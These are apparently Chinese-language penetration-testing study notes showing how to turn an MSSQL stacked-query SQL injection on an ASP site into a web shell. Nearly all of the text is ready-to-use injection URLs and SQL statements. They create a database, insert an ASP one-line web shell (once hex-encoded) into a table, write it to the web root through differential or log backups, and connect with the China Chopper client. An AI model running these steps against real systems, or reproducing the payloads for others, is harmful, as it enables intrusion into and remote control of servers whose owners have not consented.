任务二 注入点拿shell
路径的爆破
https://blog.csdn.net/edu_aqniu/article/details/78409451
0X01判断 是否为判断当前数据库用户名是否为DB_OWNER:
是
Mssql拿shell有两种方法 win2008sever里面
0X02数据库备份拿shell
0X001 创建自己的数据库
http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong;
0X002先进行一次完整备份:
?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli';
0X003使用数据库:
http://www.aspx-sqli.com/index.asp?id=1;use%20zhong;
0x004创建新表:在数据库名为中的库里面创建一个新的cmd表
create table [dbo].[zhong] ([cmd] [image]);
0X006向cmd表中插入数据
?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E);
0X007进行数据库的差异备份
?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT;
然后菜刀连接
0X03log备份拿shell
0X001 激活为还原模式
这里要注意的是我们通过备份拿shell 要注意是需要进行数据库的
LOG备份需要先把指定的数据库激活为还原模式,所以需要执行alter database XXX set RECOVERY FUL,而差异备份不需要,所以只有这条语句的就是LOG备份
?id=1;alter database asp_test set RECOVERY FULL –
0X002创建新的表cmd
?id=1;create table cmd (a image) –
0X003备份当前库的log到网站根目录
?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init –
0X004在cmd表的a列中插入一句话
insert into cmd (a) values ('<%%25Execute(request("go"))% %25>')--
0X005备份差异log
;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' --
0x006 菜刀连接
----致谢 卿哥
https://www.cnblogs.com/-qing-/p/10364190.html
带我们一点一点了解渗透
学习之路 少就是多 慢就是快